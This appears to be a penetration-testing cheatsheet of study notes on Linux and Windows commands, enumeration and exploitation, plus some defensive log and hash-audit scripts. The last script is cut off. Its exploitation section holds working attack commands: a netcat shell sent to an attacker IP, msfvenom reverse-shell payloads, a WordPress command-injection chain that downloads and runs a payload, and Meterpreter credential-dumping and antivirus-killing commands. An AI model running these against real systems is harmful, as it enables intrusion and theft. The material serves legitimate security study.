pentesting-cheatsheet

Table of Contents

  • I. Linux Operating System
  • II. Windows Operating System
    • CMD
  • Network Enumeration
  • Exploitation
    • Burp Suite
    • Hydra
    • Reverse Shell
  • Privilege Escalation

I. Linux Operating System

  • Shortcuts CTRL + P change the prompt style

  • Commands file <a-file> print the type of the file

cat -n <a-file> print the content of the file with the line numbering

less +F <a-file> print the content of the file and keep waiting for changes to display them (like tail -f; the lowercase -F option only means quit if the file fits on one screen)

head -n 3 print first 3 lines

tail -n 3 print last 3 lines

man -k printf or man -k '^shadow$' search the short descriptions and manual page names for the keyword (interpreted as a regular expression) and print any matches. Equivalent to apropos printf.

set print all shell variables and functions of the current shell

echo $HISTFILE print the value of the shell variable that stores the path of the history file

history or cat ~/.zsh_history to print the shell history for the current user

alias ll='ls -la' setting an alias to a command

Hint To make the alias permanent beyond the current session, append alias ll='ls -la' to ~/.zshrc. ~/.zshrc contains the commands that are executed at the start of every interactive zsh shell.

cat /etc/issue print the version of linux distribution

Hint Another useful tool for identifying the kernel and architecture of the target Linux machine is uname, e.g.: uname, uname -v, uname -a or uname -r

ls -l O[a-e]* list all files/directories whose name starts with O and whose second letter is in the range a-e

or ls -l O[c-i][d-f] first letter O, second letter c-i, third letter d-f

which sbd locate a program by searching the directories listed in the PATH variable

locate mimikatz.exe locate a file or folder through the locate database (refreshed with updatedb) instead of searching the whole file system

Another way of searching the file system is the find command, which searches recursively and has, among others, these options:

  • -name to search by name (case sensitive)
  • -iname to search by name (case insensitive)
  • -type f/d/l/s to search by type (files, directories, links, sockets)
  • -size to search by size
  • -mtime to search by modification date
  • -user to search by owner
  • -perm to search by the permissions set

echo -n "within the same last line" >> text.txt append to a file; -n suppresses the trailing newline so the text lands on the same last line

Among the redirection operators in Linux there is <, which is used when a file's content should be read as the input of another program

grep -i "stderr" .bash_history search for "stderr" but case insensitive

grep -r "root" /boot search recursively through a directory for a regular expression

  • sed is a command used to edit streams on the fly: echo "Ich hasse Linux" | sed 's/hasse/liebe/' -> Ich liebe Linux

cut is used to cut out parts of a stream. Often it is used with -f (field) and -d (delimiter): echo "Ich mag Hacking, Blumen, Feen, Programmierung und IT-Sicherheit." | cut -f 1,4 -d ',' -> Ich mag Hacking, Programmierung und IT-Sicherheit.

awk is a whole programming language for text processing. Two common options when using it in the shell are -F to define the field separator and the print statement to output the resulting text: echo "ist:das:wirklich:so" | awk -F ":" '{print $4, $3, $1, $2}' -> so wirklich ist das

comm scan-a.txt scan-b.txt compare two sorted files and show their common and differing lines. With no options, it produces three-column output: column one contains lines unique to FILE1, column two lines unique to FILE2, and column three lines common to both files.

  • **-1** suppress column 1 (lines unique to FILE1)
  • **-2** suppress column 2 (lines unique to FILE2)
  • **-3** suppress column 3 (lines that appear in both files)

diff scan-a.txt scan-b.txt show the different lines of both files

diff -c scan-a.txt scan-b.txt compare 2 files with -c context format

diff -u scan-a.txt scan-b.txt compare 2 files with -u unified format

vimdiff scan-a.txt scan-b.txt compare the two files side by side in vim
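As an added example (not part of the original cheatsheet) of the comm/diff workflow above: two constructed nmap -oG result files are reduced to host:port/proto lines with awk and compared with comm to list which open ports appeared or disappeared between scans, which is how scan results are usually tracked over time. The file names, the scan content and the function names are my own.

```shell
# Added example, not from the original cheatsheet: diff two nmap greppable
# (-oG) scan results with comm. Both scan files below are constructed data;
# real -oG output separates the fields with tabs, which awk's default field
# splitting handles the same way as the spaces used here.
WORK=$(mktemp -d)

cat > "$WORK/scan-a.gnmap" <<'EOF'
# Nmap scan initiated (constructed baseline) as: nmap -oG scan-a.gnmap 10.11.1.0/24
Host: 10.11.1.5 () Status: Up
Host: 10.11.1.5 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 10.11.1.7 () Ports: 445/open/tcp//microsoft-ds/// Ignored State: filtered (999)
Host: 10.11.1.9 () Ports: 25/open/tcp//smtp///, 135/filtered/tcp//msrpc/// Ignored State: closed (998)
EOF

cat > "$WORK/scan-b.gnmap" <<'EOF'
# Nmap scan initiated (constructed follow-up) as: nmap -oG scan-b.gnmap 10.11.1.0/24
Host: 10.11.1.5 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (998)
Host: 10.11.1.7 () Ports: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server/// Ignored State: filtered (998)
Host: 10.11.1.9 () Ports: 135/filtered/tcp//msrpc/// Ignored State: closed (999)
EOF

# Reduce a -oG file to one "host:port/proto" line per open port.
# Field 2 of a "Ports:" line is the host; every field of the form
# port/state/proto/... describes one port (all but the last end in a comma).
to_port_lines() {
    awk '/Ports:/ {
        host = $2
        for (i = 3; i <= NF; i++)
            if ($i ~ /^[0-9]+\/open\//) {
                split($i, f, "/")
                print host ":" f[1] "/" f[3]
            }
    }' "$1"
}

# Print "+ host:port/proto" for ports open only in the newer scan and
# "- host:port/proto" for ports open only in the older one.
# comm needs sorted input, so both lists are sorted under the same locale
# instead of relying on the order nmap wrote them in.
scan_changes() {
    to_port_lines "$1" | LC_ALL=C sort -u > "$WORK/old.sorted"
    to_port_lines "$2" | LC_ALL=C sort -u > "$WORK/new.sorted"
    comm -13 "$WORK/old.sorted" "$WORK/new.sorted" | sed 's/^/+ /'   # only in new
    comm -23 "$WORK/old.sorted" "$WORK/new.sorted" | sed 's/^/- /'   # only in old
}

scan_changes "$WORK/scan-a.gnmap" "$WORK/scan-b.gnmap"
# prints:
# + 10.11.1.7:3389/tcp
# - 10.11.1.9:25/tcp
```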

Account Management
  • Locking a user account
  1. usermod -L username lock a user's password. This puts a '!' in front of the encrypted password in /etc/shadow, effectively disabling the password.

  2. passwd -l username lock the specified account (same effect)

  3. Editing /etc/shadow directly and adding a ! before the password field; the edit can be done with vim or nano (vipw -s keeps the file locked while editing)

  4. Another possibility is changing the login shell in /etc/passwd to /bin/false or /sbin/nologin: sudo usermod -s /sbin/nologin alice or sudo usermod -s /bin/false alice

sudo passwd --status alice show the password status of the account (locked, no password, usable password)

NOTE All groups can be found in /etc/group

  • when a group has only its primary user as member, the 4th column (the member list) in /etc/group is empty.

groups $username list all groups the user is in

Note On Debian-based systems a requirement to use sudo is membership in the group sudo. Note Editing /etc/sudoers (with visudo) changes the configuration of sudo

sudo -l check which commands the current user may run with sudo

  • One common command to obtain a root shell via sudo is: sudo -i

su -l student -c whoami run a one-liner command as another user

Linux Processes

Ctrl + z pause a running job/process

Ctrl + c stop a running job

jobs list all current jobs, then: fg %1 or bg %2 move the job with the given number to the fore- or background

ps -ef overview of all processes: -e all processes, -f full format (e.g. UID, PID, PPID)

ps -fC ping search for a specific process name

kill <pid> end a process

w quick snapshot of user activity and system status

watch -n <time in seconds> w run a command periodically

Package management

In Kali: the Advanced Package Tool (APT) is used to manage packages with update, upgrade, install, remove

apt-cache search pure-ftpd search the available packages

- To delete a package we use ``remove``, which can be extended with ``--purge`` to also delete the configuration files

Task Management (Cron tasks)
  • All periodic tasks can be found in /etc/cron.* (the * stands for the frequency), i.e.: ls -lah /etc/cron.* Note scripts under /etc/cron.* run by default as root

  • Also in /etc/crontab we can specify tasks that run at customized times and as a specific user (not only root)

Logging

In Unix-like systems the log data is stored under /var/log, i.e. ls -l /var/log

All authentication attempts are in auth.log: tail /var/log/auth.log

All logins can be seen in /var/log/wtmp, which can be read with last and who, i.e.: who /var/log/wtmp

sudo dmesg information about kernel events (USB devices connected or disconnected, hard drive errors, initial hardware detection)

journalctl show the systemd journal (actions triggered by services, timers, devices, paths, or boot processes):
  - logs from all systemd services (systemd events)
  - kernel logs
  - boot logs
  - logs from standard output (stdout) and error (stderr) of services
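As an added example (not part of the original cheatsheet) that ties the auth.log note above to the grep/awk/sed tools from the first section: a few constructed sshd lines in auth.log format are summarised per source address, the way you would check a host for a password-guessing attempt. The log lines, the threshold of 5 and the function names are my own.

```shell
# Added example, not from the original cheatsheet: summarise failed SSH
# logins from auth.log with grep/awk/sort/uniq. The log content below is
# constructed; the format matches what sshd writes to /var/log/auth.log.
WORK=$(mktemp -d)

cat > "$WORK/auth.log" <<'EOF'
Mar  3 10:01:12 kali sshd[2211]: Failed password for invalid user admin from 10.11.14.53 port 51022 ssh2
Mar  3 10:01:14 kali sshd[2211]: Failed password for invalid user admin from 10.11.14.53 port 51023 ssh2
Mar  3 10:01:15 kali sshd[2213]: Failed password for root from 10.11.14.53 port 51024 ssh2
Mar  3 10:01:16 kali sshd[2215]: Failed password for root from 10.11.14.53 port 51025 ssh2
Mar  3 10:01:17 kali sshd[2217]: Failed password for root from 10.11.14.53 port 51026 ssh2
Mar  3 10:02:40 kali sshd[2230]: Accepted publickey for kali from 192.168.1.20 port 40010 ssh2
Mar  3 10:03:01 kali sshd[2240]: Failed password for kali from 192.168.1.20 port 40011 ssh2
Mar  3 10:03:05 kali sshd[2240]: Accepted password for kali from 192.168.1.20 port 40011 ssh2
Mar  3 10:04:00 kali CRON[2250]: pam_unix(cron:session): session opened for user root by (uid=0)
EOF

# Count failed password attempts per source address, most frequent first.
# Output lines look like "5 10.11.14.53". The address is the word after
# "from", found by position-independent search because sshd inserts
# "invalid user" for unknown accounts and shifts the other fields.
failed_by_ip() {
    grep -F 'sshd' "$1" | grep -F 'Failed password' \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $1, $2 }'
}

# Source addresses with at least $2 failed attempts ($2 is the constructed
# threshold a defender would tune for their environment).
brute_force_sources() {
    failed_by_ip "$1" | awk -v limit="$2" '$1 >= limit { print $2 }'
}

# Which account names were tried from a given address. The optional
# "invalid user " prefix is stripped so only the user name remains.
failed_users_from() {
    grep -F 'Failed password' "$1" | grep -F "from $2 " \
      | sed -E 's/.*for (invalid user )?([^ ]+) from.*/\2/' | sort -u
}

# Human-readable report, e.g. "10.11.14.53: 5 failed attempts for admin root"
report() {
    brute_force_sources "$1" "$2" | while read -r ip; do
        n=$(failed_by_ip "$1" | awk -v a="$ip" '$2 == a { print $1 }')
        printf '%s: %s failed attempts for %s\n' "$ip" "$n" \
            "$(failed_users_from "$1" "$ip" | paste -sd ' ' -)"
    done
}

report "$WORK/auth.log" 5
```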

Memory and Hard drive

free -m show information about the memory RAM

df -h shows disk space usage on all mounted filesystems in a human-readable format

dd if=source of=destination bs=4M status=progress copy data at a low level, block by block, with the dd tool.

| Part | Meaning |
|---|---|
| if=source | Input file (the source you're copying from) |
| of=destination | Output file (the destination you're copying to) |
| bs=4M | Block size: read/write in 4 megabyte chunks (faster than the default 512 bytes) |
| status=progress | Show real-time progress while copying |

Be careful

  • dd is powerful but dangerous — if you mix up if= and of=, you can overwrite data!
  • Always double-check device names with lsblk or fdisk -l

lsblk list information about block devices (like hard drives, SSDs, USB sticks) in a tree-like format.

fdisk manage disk partitions. Works on MBR (Master Boot Record) partition tables.

sudo fdisk -l List all disks and their partition details

du -d 2 -h check the disk usage of directories, with a specific depth and in a human-readable format.

sudo mount /dev/sdb1 /mnt/data Device (e.g., /dev/sdb1), mount point (e.g., /mnt/data)

sudo umount /mnt/usb unmount

mount -t ext4 print information about the already mounted file systems of the given type

sudo usermod -a -G <list_of_groups> <user> to add an existing user to an existing group

id print the user ID and group IDs. Options of id:
  • -g, --group : print only the effective group ID
  • -G, --groups : print all group IDs
  • -r, --real : print the real instead of the effective ID (together with -u or -g)
  • -u, --user : print only the effective user ID


II. Windows Operating System

Shells in Windows:

  1. cmd.exe
  2. PowerShell
  3. WMIC – Windows Management Instrumentation Console
  4. Windows Subsystem for Linux (WSL)

• Command Prompt (cmd.exe) − Enables interaction with Win32 objects and applications
− Creating and manipulating files, navigating the file system
− Executing batch files (shell scripts)
− But: access to central functions of Windows system administration is not possible!

• PowerShell
− is:
▪ a command-line tool
▪ a scripting language
▪ a configuration management framework
− Based on the .NET Framework or .NET Core
− Also runs on Linux and macOS (open source)
− So-called cmdlets can be used to perform administrative tasks

CMD

echo.bat run the batch file (shell script) echo.bat

help show all commands that are built into the shell (builtins)

help <command-name> or <command-name> /? print help for a specific command

cd is for navigation in the file system; cd \ changes to the root directory of the current drive

type file.txt output the content of a file

dir show the content of a directory (= ls in Linux)

systeminfo show system information

Environment variables are referenced in Windows with percent signs: %PATH%

set without parameters: show all environment variables. With parameters: set a temporary environment variable.

setx set an environment variable permanently

  • Sysinternals is developed by Microsoft to address functionality that CMD lacks by default.
    • It is not installed by default
    • Before use, the End-User License Agreement (EULA) must be accepted: option /accepteula

i.e. psinfo /accepteula show local system info; the option /accepteula is needed the first time after installation.

echo can be used to print to the console and also to write into files

echo "Write this text into a File" > NewFile.txt write to a file

echo 2> EmptyFile.txt create an empty file by redirecting the (empty) error output of echo to the file

del EmptyFile.txt delete a file

rename NewFile.txt RenamedFile.txt or ren NewFile.txt RenamedFile.txt rename a file

move RenamedFile.txt .\Folder move a file

mkdir Subfolder create a folder

rmdir Subfolder remove a folder

copy RenamedFile.txt CopiedFile.txt copy a file

  • xcopy and robocopy are two other commands for copying files that are mostly used in batch scripts

fc RenamedFile.txt CopiedFile.txt compare the content of two files (file compare)

mklink softlink fileToBeLinkedTo.txt create a symbolic (soft) link

mklink /h hardlink anotherFileToBeLinkedTo.txt create a hard link

dir /s fileTofind.txt search for a file in the current dir and the sub directories

dir /s *.txt search with a wildcard

tree show the tree of the folders in current path

tree /F show the folder structure including files in the current path as a graph

forfiles selects a file (or set of files) and executes a command on each of them

forfiles /P C:\Windows /S /M notepad.exe /c "cmd /c echo @PATH" find the path of a file

  • /P search path (starting point)
  • /S recursive search
  • /M file name mask to match
  • /c command to run on each matched object. Note In the Windows forfiles command, the @ symbol marks a variable placeholder for properties of each file it processes: @PATH = the full path to the matched file (e.g., C:\Windows\System32\notepad.exe)

find "Passwort" C:\Users\Steff\Folder\doNotShare.txt or type doNotShare.txt | find "Passwort" search for a text in files

The find command can be used like grep in Linux, just without regular expressions, as in: type doNotShare.txt | find "Passwort"

The findstr command searches for strings and accepts regular expressions and multiple search strings. Note When given two strings separated by a space, the output is every line that contains at least one of the two strings, as in: findstr "File Passwort" doNotShare.txt

sort wordsToSort.txt sort text in a file

whoami /user show SID (Security Identifier) of the current windows user

Local Accounts and Groups

• By default, a Windows system includes several predefined users or groups:

Administrator:

  • Created for the system administrator
  • SID: S-1-5-domain-500
  • Has full access rights to files and directories
  • Disabled by default in Windows 10
  • During installation, another account receives administrator rights by being added to the Local Administrator group

Guest:

  • Allows unregistered users to log in to the machine with limited privileges
  • No password by default
  • Disabled by default
  • SID of the Guest group: S-1-5-32-546

SYSTEM:

  • Used by the operating system to run services that require elevated privileges
  • This account cannot be accessed or logged into by a human user

The net command is used to create and administer users and groups (creating, deleting and editing accounts or groups)

net user {username} /add add a new local account Note requires administrative privileges

net user {username} show info about an account, e.g. whether the user is active or not

Local groups on the system are listed with net localgroup.

  • The net command can also be used to view the members of a local group and to modify their membership. Particularly interesting groups:
  • Administrators: members have the same rights as the Administrator account
  • Remote Desktop Users: only members of this group can access the desktop (GUI) of the target system remotely

Group membership can be modified using net localgroup <groupname> <username> <option>, for example with /add or /delete to add or remove a user from a group.

net accounts show and edit the account policy

tar -xf ncat.zip extract a compressed archive (the tar built into Windows also unpacks zip files)

Linux Networking & Services

ifconfig or ip addr show details of network devices and interfaces

Change the IP address in the shell:

Change to a specific IP address: edit /etc/network/interfaces, append the following and substitute the interface details:

       allow-hotplug [interface]
       iface [interface] inet static
       address [IP]
       netmask [Netmask]
       gateway [Default_Gateway]

then sudo ifdown [interface] and sudo ifup [interface]

Change to be set automatically by a DHCP server: edit /etc/network/interfaces and append:

       allow-hotplug [interface]
       iface [interface] inet dhcp

hostname show the hostname (very often also shown after the @ symbol in the prompt)

netstat -natup enumerate the active and listening connections on all ports: -n numeric addresses, -a listening and non-listening sockets, -t TCP connections, -u UDP connections, -p PID and name of the program

ss -netup another utility to investigate sockets

arp -en enumerate the neighbours on layer 2 of the OSI model (ARP cache)

route show the IP routing table

  • DNS Server (nameserver) is contained in /etc/resolv.conf
  • fixed entries (without extra DNS Server) are stored in /etc/hosts
  • The order of name resolution is in /etc/nsswitch.conf (Name Service Switch)

host www.megacorpone.com show the IP address of a specific domain

host -t mx www.megacorpone.com and host -t txt www.megacorpone.com show the MX or TXT records of a specific domain

nslookup kali.org and dig kali.org show DNS records

dig -t mx www.megacorpone.com show the MX records of the domain

dig @8.8.8.8 kali.org run the dig query through a specific name server

SSH

sudo systemctl start ssh start ssh server

sudo systemctl status ssh check the ssh status

ssh username@host establish an SSH connection

who show currently active users

exit exit ssh

  • configuration of the ssh client : /etc/ssh/ssh_config
  • Configuration of the daemon ( server process) of ssh : /etc/ssh/sshd_config

ssh kali@god -p 999 run ssh with other port than the standard port 22

  • List of the known hosts in the ssh service: ~/.ssh/known_hosts
  • ~/.ssh/authorized_keys : The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured.

The interactive host-key prompt (which otherwise adds the host to ~/.ssh/known_hosts on confirmation) is suppressed by:

  • setting StrictHostKeyChecking no in /etc/ssh/ssh_config (or per user in ~/.ssh/config)
  • or running ssh with the option -o StrictHostKeyChecking=no

Note that with this setting new host keys are still added automatically and a changed (possibly spoofed) host key is no longer rejected; -o UserKnownHostsFile=/dev/null additionally prevents saving the keys.

ssh -i id_rsa cactus@10.10.201.219 connect to a specific host over SSH with a given identity file / private key (-i)

scp username@host:remote-file-path . securely copy a remote file Note In some circumstances the SSH password has to be stored and reused in a script; sshpass helps with that: sshpass -p "password" ssh kali@localhost

  • Netcat Netcat can redirect STDIN through the network. With this we can send whole files.

Netcat can also redirect the whole output of programs over the network. For that netcat has to be compiled with the flag -DGAPING_SECURITY_HOLE set; nc is then run with the flag -e to redirect STDIN, STDOUT and STDERR.

  • Wget wget <website_url> download data from the internet; -O : write the output to a specific file name; -o : write a log file; --recursive : recursive download of a website (!! Warning: can pull a whole site)

  • Curl curl https://www.kali.org simple way of inspecting and manipulating HTTP requests and responses

When using curl to download, you must specify the output target: curl <website_url> -o doku_kali.org

curl https://www.offensive-security.com -I output only the HTTP headers of the response. Useful when the response is binary data: binary data should not be dumped to the terminal, so specify an output file with -o instead.

  • FTP ftp 10.11.1.14 establish an FTP connection

  • To send files to the server use put: put client.txt

  • To receive files from the server use get: get cmd.asp

  • To change the transfer mode of the sent data: bin or ascii

  • Firewalls, ACLs and iptables

sudo iptables -L list the rules (ACL) of the netfilter packet-filter framework

  • Filter table The standard table has 3 chains for INPUT, OUTPUT and FORWARD traffic

sudo iptables -P FORWARD DROP change the default policy of a chain

For editing the filter table: -p the protocol, mostly tcp, udp or icmp; -s the source in CIDR notation; -d the destination address; -i or -o the input or output interface; -A the chain the rule is appended to; -j the target of the rule (e.g. ACCEPT, DROP)

e.g. sudo iptables -s 192.168.1.0/24 -p all -A INPUT (without -j the rule only counts the matching packets)

sudo iptables -L --line-numbers list the rules with their position numbers

sudo iptables -D INPUT 1 delete rule number 1 of the INPUT chain

sudo iptables -nvL show packet and byte counters per rule (measure traffic)

Linux Password Cracking

sudo unshadow /etc/passwd /etc/shadow > hashes.txt then john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt is one way to crack passwords with John the Ripper in this format

Python Scripting

  • Switch between Python 2 and 3: pyenv versions; pyenv global 2.7.15 (Python 2); pyenv global system (Python 3); python --version

Network Enumeration

Nmap

e.g. nmap -sS -sV -A 192.168.6.xxx important options:

  • [-p Port] port(s) to scan
  • [-sn] ping scan, disables the port scan
  • [-PN] skip host discovery (treat all hosts as online)
  • [-sU] UDP scan (can take a long time)
  • [-sV] version detection
  • [-O] OS detection
  • [-A] OS & version detection, script scanning, traceroute
  • [-sT] TCP connect() scan
  • [-sS] SYN stealth scan (Note SYN scans need raw sockets, so through SSH port forwarding or proxies use -sT instead; check the behaviour over a VPN as well)
  • [-T <0-5>] set the timing template (higher is faster)
  • A port can be open, filtered, closed or unfiltered
  • Nmap Script Engine (NSE) [-sC or --script=<script>]
  • [--top-ports=#] scan the given number of most common ports
  • [-oG] save the scan result in greppable format (-oN normal, -oX XML, -oA all formats)

  • Script nmap automator

  • Nmap Cheatsheet

Banner Grabbing

nc -vn 192.168.6.44 21 banner grabbing with nc (-v verbose, -n numeric IP address, no DNS lookup)

Port Enumeration

53 DNS

Slide 60-65 Information Gathering

host -t ns megacorpone.com look up the records of type NS (name server) of megacorpone.com

host -l megacorpone.com ns1.megacorpone.com show the DNS zone file (zone transfer) if it is not protected

  • dnsrecon dnsrecon -d megacorpone.com -t axfr DNS zone transfer with AXFR

  • dnsenum dnsenum th-deg.de DNS enumeration for a specific domain

139/ 445 or 137 (UDP) SMB

sudo enum4linux -S <ip address> enumerate the shares

smbclient -L //10.10.201.219/ list the SMB shares Note forward slashes are used for the share path on Linux

Note After connecting to a share you can download a file from it by typing get <file, e.g. id_rsa>, and leave with exit

  • ls -l /usr/share/nmap/scripts/smb* list the scripts of the nmap script engine (NSE) for SMB

  • Enumerate with nmap: nmap --script smb-vuln* -p 139,445 [ip] or nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254

  • Enumerate with nmap on a Windows machine: nmap -p 135,445 --script=smb-vuln-ms* 10.11.1.5 Note port 135 is MSRPC

  • Enumerate with nbtscan: nbtscan -r 10.11.1.0/24

  • The auxiliary/scanner/smb/smb_version Metasploit module for enumeration and fingerprinting

111 NFS
  • nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 Enumerate NFS for shares with nmap

  • ls -l /usr/share/nmap/scripts/nfs* list scripts in nmap script engine(NSE) for NFS

  • nmap -p 111 --script nfs* 10.11.1.72 Enumerate NFS with all nmap scripts of NFS

  • mkdir home sudo mount -o nolock 10.11.172:/home ~/home/ cd home && ls mounting and accessing a share in a remote NFS Server

25 SMTP
  • interesting commands e.g. VRFY and EXPN

  • nc -vn 10.11.1.217 25 Enumeration of SMTP with netcat (Banner Grabbing)

80, 443 HTTP, HTTPS
  • Developer tools shortcut: CTRL + Shift + I

  • The /robots.txt and /sitemap.xml files often contain helpful hidden details

  • gobuster dir -u [URL] -w /usr/share/wordlists/dirb/common.txt Enumerate directories of a website

  • Other wordlists could be found in /usr/share/seclists/Discovery/Web-Content/

  • for i in {1..100}; do curl -s -L -i http://<IP>/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done Enumerating users on a Wordpress Website

  • wpscan -u <IP> --threads 10 --wordlist /usr/share/wordlists/rockyou.txt --username admin

nikto -h 192.168.1.1 vulnerability scan of the specified host (-h)

Exploitation

Search for Exploits

searchsploit
  • search exploits in exploit-db: searchsploit <exploit term>; searchsploit -u updates the archive. The exploits are then found in /usr/share/exploitdb/exploits/

  • Automated exploit search on exploit-db: nmap -sV -oX file.xml <target> then searchsploit --nmap file.xml

getsploit: tool that searches multiple collections: Exploit-DB, Metasploit, Packetstorm and others
  • pip install getsploit
  • getsploit wordpress 4.7.0

Exploit Frameworks

− Cobalt Strike (https://www.cobaltstrike.com/)
− Metasploit Framework (https://www.metasploit.com/)
− Metasploit Pro (https://www.rapid7.com/products/metasploit/)
− CORE IMPACT (https://www.coresecurity.com/core-impact)
− Immunity CANVAS (https://www.immunityinc.com/products/canvas/)
− D2 Elliot Web Exploitation Framework (https://www.d2sec.com/elliot.html)
− BeEF Browser Exploitation Framework (https://beefproject.com/)

Metasploit

msf > search [regex] search for a module or exploit (or CVE)

msf > use exploit/[ExploitPath] specify an exploit to use

msf > set PAYLOAD [PayloadPath] specify a payload to use

msf > show options show the options of the current module

msf > set [Option] [Value] set options

msf > exploit or msf > run start the exploit

msf > debug display information useful for debugging

Windows Meterpreter

  • meterpreter > help
  • meterpreter > clearev
  • meterpreter > download c:\PATH
  • meterpreter > ifconfig
  • meterpreter > migrate PID
  • meterpreter > sysinfo
  • meterpreter > background
  • meterpreter > shell
  • meterpreter > keyscan_start
  • meterpreter > getsystem (requires an admin account)
  • meterpreter > hashdump
  • Windows Meterpreter Mindmap

  • Meterpreter scripts, mostly for post exploitation:
    • meterpreter > run checkvm
    • meterpreter > run getgui
    • meterpreter > run get_local_subnets
    • meterpreter > run killav
    • meterpreter > run winenum
    • meterpreter > run metsvc
    • meterpreter > run persistence
    • meterpreter > run getcountermeasure
    • meterpreter > run packetrecorder

  • Ncat Victim (Windows): ncat -v 10.11.0.215 444 -e cmd.exe --ssl Attacker (Kali): ncat -lvp 444 --allow 10.11.14.53 --ssl

WordPress
  • After logging in: Metasploit module exploit/unix/webapp/wp_admin_shell_upload OR manual: Uploading Shell In WordPress

  • curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')" inject a command through a URL parameter (Python 2 syntax)

  • Full manual exploit of WordPress for getting a reverse shell:
    1. msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=443 -b "\x00" -f elf -o /var/www/html/shell.elf
    2. service apache2 start
    3. curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"wget <Attacker_IP>/shell.elf"})')"
    4. curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"chmod +x shell.elf"})')"
    5. curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"./shell.elf"})')"

Web Applications
  • Vulnerability Scanner (Subdomain Finder): Nuclei
  • Multi Purpose (Scanner, Proxy, Sequencer, Comparer, Intruder,Repeater): Burp Suite
  • SQL Injection / Database Fingerprinting: sqlmap
  • Directory Scanner: DirBuster, gobuster, feroxbuster, Dirsearch, DIRB, ffuf, Wfuzz, OWASP ZAP, …
  • Path Traversal: dotdotpwn

Payload

CyberChef; Ciphey (automated decryption/decoding/cracking tool); PayloadsAllTheThings (bypasses & payloads for web application security)

Shellcode

Introduction to Writing Shellcode (OffSec); MSFvenom

msfvenom

msfvenom --list platforms, msfvenom --list archs, msfvenom --list payloads, msfvenom --list encoders

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f c generate the shellcode of a reverse TCP shell payload in C format (C language)

Burp suite

  • Ctrl + Shift + D Dashboard
  • Ctrl + Shift + T Target tab
  • Ctrl + Shift + P Proxy tab
  • Ctrl + Shift + I Intruder tab
  • Ctrl + Shift + R Repeater tab

Password Cracking

Note Before you crack a hash you should search for it online ==> probably saves a lot of time

  • The hash-identifier tool helps to find the type of a hash

Hashes in OS can be found in :

  • Linux : /etc/shadow
  • Windows : sam file (system32\config\sam)
  • Active Directory : NTDS.dit

− Linux: /etc/shadow format of the hash value: $id$salt$hash

  • $1$: MD5-based crypt ('md5crypt')
  • $sha1$: SHA-1-based crypt ('sha1crypt')
  • $5$: SHA-256-based crypt ('sha256crypt')
  • $6$: SHA-512-based crypt ('sha512crypt')

− Windows: SAM file (system32\config\sam) format of an entry: uid:rid:lm_hash:ntlm_hash

  • The LM hash algorithm is outdated, therefore on modern systems the LM_Hash field is filled with the hash value of the empty string (aad3b435b51404eeaad3b435b51404ee)
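Added example (not from the original cheatsheet) for the two hash formats above: a small shell audit that classifies each /etc/shadow entry by its $id$ prefix and reports accounts that still use md5crypt/sha1crypt or have an empty password field, and checks a pwdump-style SAM dump for accounts that still carry a real LM hash or a blank NT password. It goes slightly beyond the list above by also recognising the bcrypt ($2a$/$2b$/$2y$) and yescrypt ($y$) prefixes; the input files, hash bodies and function names are constructed.

```shell
# Added example, not from the original cheatsheet: audit password hash
# formats in shadow and SAM-dump files. All input data below is constructed;
# the hash bodies are placeholders, not real hashes.
WORK=$(mktemp -d)

cat > "$WORK/shadow" <<'EOF'
root:$6$a1b2c3d4$constructedsha512hashbody:19700:0:99999:7:::
legacy:$1$vb1tLY1l$If2W7VheNl4T1y7DZJPnQ/:19700:0:99999:7:::
alice:!$6$e5f6g7h8$constructedsha512hashbody:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
nopass::19700:0:99999:7:::
EOF

# pwdump format: user:rid:lm_hash:ntlm_hash:::  (constructed values; the LM
# field of the first two accounts holds the "empty" LM value from the text)
cat > "$WORK/sam.dump" <<'EOF'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
EOF

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty string (from the text)
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty string

# Name the crypt(3) algorithm from the $id$ prefix of one shadow hash field.
# A leading "!" (usermod -L / passwd -l) is reported as locked:<algorithm>.
crypt_alg() {
    h=$1; prefix=""
    case "$h" in '!'*) prefix="locked:"; h=$(printf '%s' "$h" | sed 's/^!*//') ;; esac
    case "$h" in
        '$1$'*)                   alg=md5crypt ;;
        '$sha1$'*)                alg=sha1crypt ;;
        '$5$'*)                   alg=sha256crypt ;;
        '$6$'*)                   alg=sha512crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  alg=bcrypt ;;
        '$y$'*)                   alg=yescrypt ;;
        '*')                      alg=nologin ;;   # no password login possible
        '')                       alg=empty ;;     # passwordless account
        *)                        alg=unknown ;;
    esac
    printf '%s%s\n' "$prefix" "$alg"
}

# Print "user algorithm" for every line of a shadow-format file.
audit_shadow() {
    while IFS=: read -r user hash rest; do
        if [ -n "$user" ]; then
            printf '%s %s\n' "$user" "$(crypt_alg "$hash")"
        fi
    done < "$1"
}

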